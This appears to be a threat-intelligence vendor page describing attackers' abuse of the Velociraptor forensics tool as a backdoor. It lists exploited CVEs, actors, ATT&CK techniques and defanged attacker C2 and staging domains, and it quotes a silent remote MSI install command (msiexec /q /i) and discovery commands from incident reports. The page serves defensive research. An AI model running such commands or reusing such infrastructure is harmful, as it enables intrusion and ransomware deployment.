Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to malware
MalwareRansomwareUsed by 2 actorsExploits 11 CVEs

Velociraptor

Velociraptor is a legitimate open-source digital forensics and incident response (DFIR) tool that threat actors have repeatedly abused as a post-compromise backdoor and command-and-control framework. Across the provided reporting, attackers used Velociraptor to execute commands, collect artifacts, remotely control endpoints, maintain persistence, and establish covert access channels, including Visual Studio Code tunnels and Cloudflare-backed tunnel infrastructure. Multiple reports describe deployment of Velociraptor as an MSI payload, often using outdated version 0.73.4/0.73.4.0, and configuring it to communicate with attacker-controlled infrastructure such as Cloudflare Workers domains. Reported examples include use by the Warlock ransomware ecosystem and the actor tracked as GOLD SALEM / Storm-2603, including intrusions involving SharePoint ToolShell exploitation, SmarterMail exploitation, and SolarWinds Web Help Desk exploitation. In these cases, Velociraptor was used to maintain access, stage ransomware deployment, and in some incidents directly support Warlock, LockBit, or Babuk ransomware operations. Additional reporting links Velociraptor abuse to The Gentlemen ransomware-as-a-service operation as part of its broader intrusion toolkit. Observed behaviors include installation as a Windows service, use as the primary C2 framework, downloading and launching Visual Studio Code with tunneling enabled, and acting as a tunnel to C2. High-confidence infrastructure and configuration details mentioned in the content include server URLs such as velo[.]qaubctgg[.]workers[.]dev, chat.hcqhajfv.workers[.]dev, auth.qgtxtebl.workers[.]dev, and update[.]githubtestbak[.]workers[.]dev, as well as MSI staging locations including files[.]qaubctgg[.]workers[.]dev, royal-boat-bf05.qgtxtebl.workers[.]dev, and Supabase-hosted payloads such as v4.msi. Several reports specifically note attacker use of Velociraptor version 0.73.4 as an outdated release associated in the reporting with CVE-2025-6264.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

11 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

11 CVES
CVE-2025-59287Unauthenticated RCE in Windows Server Update Services (WSUS)Exploited in the wild

Huntress analysts detected an incident where threat actors likely exploited a recently patched remote code execution vulnerability in Windows Server Update Services (WSUS). After gaining initial access via exploitation of the flaw (CVE-2025-59287), the actors then installed Velociraptor... This deserialization issue has previously been exploited by threat actors targeting vulnerable WSUS instances exposed publicly on their default ports; as of October 23, a patch is available from Microsoft.

via huntress bloghuntress.com
CVE-2025-53770ToolShell RCE in Microsoft SharePoint Server

Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.

via huntress bloghuntress.com
CVE-2025-6264Privilege Escalation in Rapid7 Velociraptor Admin.Client.UpdateClientConfig Artifact

Threat actors have started to use the Velociraptor digital forensics and incident response (DFIR) tool in attacks that deploy LockBit and Babuk ransomware.

via bleeping computerbleepingcomputer.com
CVE-2025-49706Microsoft SharePoint Server improper authentication spoofing vulnerability (ToolShell component)

Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.

via huntress bloghuntress.com
CVE-2025-53771SharePoint ToolShell authentication bypass / spoofing vulnerability

Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.

via huntress bloghuntress.com
CVE-2025-49704Microsoft SharePoint Server remote code execution (ToolShell component)

Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.

via huntress bloghuntress.com
CVE-2026-24423Unauthenticated RCE in SmarterTools SmarterMail ConnectToHub APIExploited in the wild

"CVE-2026-24423... exploits a weakness in the ConnectToHub API method to achieve unauthenticated remote code execution (RCE)."

via the hacker newsthehackernews.com
CVE-2026-23760Authentication Bypass in SmarterTools SmarterMail Password Reset APIExploited in the wild

"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."

via the hacker newsthehackernews.com
CVE-2025-26399Unauthenticated AjaxProxy Deserialization RCE in SolarWinds Web Help DeskExploited in the wild

Huntress reported active exploitation of SolarWinds Web Help Desk vulnerabilities (CVE-2025-26399 and CVE-2025-40551) by unidentified threat actors, deploying remote management tools and Velociraptor for command and control.

via cert eu threat intelcert.europa.eu
CVE-2025-40551Unauthenticated RCE in SolarWinds Web Help Desk DeserializationExploited in the wild

Huntress reported active exploitation of SolarWinds Web Help Desk vulnerabilities (CVE-2025-26399 and CVE-2025-40551) by unidentified threat actors, deploying remote management tools and Velociraptor for command and control.

via cert eu threat intelcert.europa.eu
CVE-2025-40536Security Control Bypass in SolarWinds Web Help Desk

"Shortly after reconnaissance, the attacker deployed Velociraptor, an open-source DFIR platform... its ability to execute commands, collect artifacts, and remotely control endpoints makes it an effective command-and-control (C2) framework when misused."

via cyber security newscybersecuritynews.com
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Storm-2603

In August, CTU researchers observed GOLD SALEM abusing the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool to establish a Visual Studio Code network tunnel within the compromised environment. Some of these incidents ended in Warlock ransomware deployment.

via sophos threat researchnews.sophos.com
Warlock

...followed by dropping additional payloads like Velociraptor and the locker to encrypt files.

via the hacker newsthehackernews.com
MITRE ATT&CK

Techniques & procedures

23 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1583Acquire InfrastructureEvidence1

The attacker prepared their own Elastic Cloud free trial, using legitimate Elastic infrastructure, using it as a repository for stolen data across intrusions.

Initial Access

1 technique
T1190Exploit Public-Facing ApplicationEvidence3

After gaining initial access via exploitation of the flaw (CVE-2025-59287), the actors then installed Velociraptor... This deserialization issue has previously been exploited by threat actors targeting vulnerable WSUS instances exposed publicly on their default ports.

Execution

5 techniques
T1053Scheduled Task/JobEvidence1

"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."

T1059Command and Scripting InterpreterEvidence1

These tactics are in addition to previous post-exploit tools and techniques used by the group, which included the Velociraptor digital forensics and incident response (DFIR) tool as its primary command-and-control (C2) framework...

T1059.001PowerShellEvidence3

After the threat actor installed Velociraptor, we observed a number of base64-encoded PowerShell commands, which were child processes of Velociraptor.exe...

T1059.003Windows Command ShellEvidence2

"the Java process executed cmd.exe to silently install a remote MSI payload: msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi"

T1569.002Service ExecutionEvidence1

"used the SmarterMail process MailService.exe to spawn a command shell"

Persistence

2 techniques
T1053Scheduled Task/JobEvidence1

"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."

T1556Modify Authentication ProcessEvidence1

"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."

Privilege Escalation

2 techniques
T1053Scheduled Task/JobEvidence1

"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."

T1068Exploitation for Privilege EscalationEvidence2

"used an outdated version of the Velociraptor, 0.73.4, which is vulnerable to a privilege escalation flaw that allows increasing permissions on the host."

Stealth

5 techniques
T1027Obfuscated Files or InformationEvidence1

we observed a number of base64-encoded PowerShell commands, which were child processes of Velociraptor.exe

T1036MasqueradingEvidence2

Since Velociraptor is widely trusted and commonly used by security teams, its presence blended seamlessly with normal administrative behavior, making it an effective cover for malicious activity running in plain sight.

T1218System Binary Proxy ExecutionEvidence1

"...installs Velociraptor, a legitimate digital forensics tool... to maintain access and set the stage for ransomware."

T1218.007MsiexecEvidence2

"...download a malicious MSI installer (\"v4.msi\")..."

T1497.003Time Based ChecksEvidence1

"...install files and wait approximately 6–7 days before taking further action... malicious activity was triggered later."

Defense Impairment

1 technique
T1556Modify Authentication ProcessEvidence1

"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."

Credential Access

2 techniques
T1003OS Credential DumpingEvidence1

Velociraptor Used as a covert C2 platform, including memory and LSASS dumping... KslDump Dumps Kerberos / LSASS-related material... buildx641 ... uses ... ntds.dit, and SYSTEM copies...

T1556Modify Authentication ProcessEvidence1

"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."

Discovery

4 techniques
T1007System Service DiscoveryEvidence1

These commands launched a series of discovery queries, allowing the threat actor to gather information about users, running services, configurations, and more.

T1082System Information DiscoveryEvidence3

The group deployed Velociraptor, a legitimate forensic tool, running it with the highest system privileges to map the environment and collect data.

T1087Account DiscoveryEvidence1

These commands launched a series of discovery queries... "C:\Windows\system32\net.exe" group "domain computers" /do "C:\Windows\system32\quser.exe"

T1497.003Time Based ChecksEvidence1

"...install files and wait approximately 6–7 days before taking further action... malicious activity was triggered later."

Command and Control

4 techniques
T1071Application Layer ProtocolEvidence5

Velociraptor... was configured to communicate with the endpoint update[.]githubtestbak[.]workers[.]dev .

T1090ProxyEvidence2

For remote access and C2, they rely on frameworks like ZeroPulse and Velociraptor, combined with Cloudflare-based tunnels and custom VPN setups to keep stable access into compromised networks.

T1105Ingress Tool TransferEvidence7

... Cobalt Strike ... Impacket ... Velociraptor ... Cloudflared ... VS Code Tunnel ...

T1219Remote Access ToolsEvidence7

Legitimate tooling continues to blur the line. Velociraptor, Cloudflared, VSCode Tunnels, AnyDesk, MeshCentral, FreeRDP, PuTTY, OpenSSH, and a long list of legitimate cloud services are all being repurposed for ransomware operations.

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

Data exfiltration is then carried out using automated tools and tuned configurations to move large volumes of data efficiently...

INDICATORS OF COMPROMISE

IOCs tracked for this family

8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
6 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
2 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app3 months ago
uri●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app4 months ago
domain●●●●●●●●●●●●View more in app7 months ago
domain●●●●●●●●●●●●View more in app7 months ago
domain●●●●●●●●●●●●View more in app7 months ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching8

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities11

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping23

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.